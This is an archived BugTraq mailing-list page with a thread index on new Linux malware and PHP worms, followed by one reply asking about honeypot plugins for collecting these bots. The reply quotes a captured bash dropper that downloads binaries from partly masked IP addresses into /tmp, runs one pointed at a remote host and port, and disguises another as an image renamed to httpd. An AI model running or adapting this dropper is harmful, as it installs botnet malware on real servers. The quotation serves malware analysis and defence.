BugTraq
new linux malware Feb 18 2006 10:40PM
Gadi Evron (ge linuxbox org) (2 replies)
Re: new linux malware Feb 20 2006 04:57PM
Christine Kronberg (Christine_Kronberg genua de) (1 replies)
PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 20 2006 08:22PM
Gadi Evron (ge linuxbox org) (2 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Dec 30 2006 10:00PM
Kevin Waterson (kevin oceania net) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 01 2007 05:53PM
Bill Nash (billn billn net) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 01 2007 09:00PM
Tino Wildenhain (tino wildenhain de) (1 replies)
RE: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 01 2007 09:31PM
Jim Harrison (Jim isatools org) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 01 2007 10:37PM
Dana Hudes (dhudes hudes org) (1 replies)
RE: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 12:02AM
Jim Harrison (Jim isatools org) (2 replies)
Re: PHP as a secure language? PHP worms? Jan 02 2007 12:01PM
Duncan Simpson (dps simpson demon co uk) (1 replies)
RE: PHP as a secure language? PHP worms? Jan 02 2007 02:17PM
Jim Harrison (Jim isatools org)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 10:58AM
Darren Reed (avalon caligula anu edu au) (2 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 03:16PM
Dana Hudes (dhudes hudes org) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 06:48PM
Lawrence Paul MacIntyre (macintyrelp ornl gov)
RE: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 02:15PM
Jim Harrison (Jim isatools org) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 06:37PM
Darren Reed (avalon caligula anu edu au) (3 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 03 2007 05:16AM
Ronald Chmara (ron Opus1 COM) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 04 2007 08:59PM
Jim Manico (jim manico net)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 09:07PM
Bill Nash (billn billn net)
RE: PHP as a secure language? PHP worms? [was: Re: new linux malware] Jan 02 2007 07:18PM
Jim Harrison (Jim isatools org)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 22 2006 10:48AM
Kevin Waterson (kevin oceania net) (2 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 24 2006 09:13PM
Matthew Schiros (schiros gmail com) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 27 2006 03:26PM
L. Adrian Griffis (agriffis dstsystems com) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 27 2006 03:50PM
Matthew Schiros (schiros gmail com) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 27 2006 04:21PM
L. Adrian Griffis (agriffis dstsystems com) (1 replies)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 27 2006 05:55PM
Matthew Schiros (schiros gmail com)
Re: PHP as a secure language? PHP worms? [was: Re: new linux malware] Feb 24 2006 09:07PM
Jamie Riden (jamie riden gmail com)
Re: new linux malware Feb 20 2006 04:24PM
Marco Monicelli (marco monicelli marcegaglia com) (1 replies)
Re: new linux malware Feb 20 2006 07:58PM
Gadi Evron (ge linuxbox org) (1 replies)
Re: new linux malware Feb 22 2006 08:00PM
Jamie Riden (jamie riden gmail com)
On 21/02/06, Gadi Evron <ge (at) linuxbox (dot) org [email concealed]> wrote:
>
> Indeed, it has become an annoying trend everybody talks about but nobody
> writes about. Trojan horses, worms, etc. exploiting PHP bugs. Either
> vulnerabilities in know applications such as WordPress, PHPBB, Drupal,
> etc. or actually trying different permutations to attack the site.
<snip>
> Anyone else seeing their web server logs going crazy with new patterns
> every day? Email me, I am starting a sharing system where these can be
> shared mutually so we can better protect ourselves, create signatures, etc.

I got as far as looking at mwcollect and nepenthes to see if anyone
had written plugins to slurp these bots, but couldn't find anything.
Typically they're some sort of variant on:

#!/bin/bash
cd /tmp
wget xxx.yy.105.36/ping
mv ping cb
chmod +x cb
./cb xxx.yyy.233.251 8080 &
killall -9 lordnikonz
wget xxxx052101/images/logo.jpg
mv logo.jpg httpd
rm -rf scripz
chmod +x httpd
export PATH="."
httpd

with payloads being variously identified as Kaiten, Linux.RST and
Lupii by Symantec AV. This is just stuff trying the old awstats
exploit, I haven't coded up any handlers for the xml-rpc, or other
exploits.

So - any handlers/plugins for these? And if so, is anyone (respectable
:) collecting the malware?

cheers,
Jamie

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus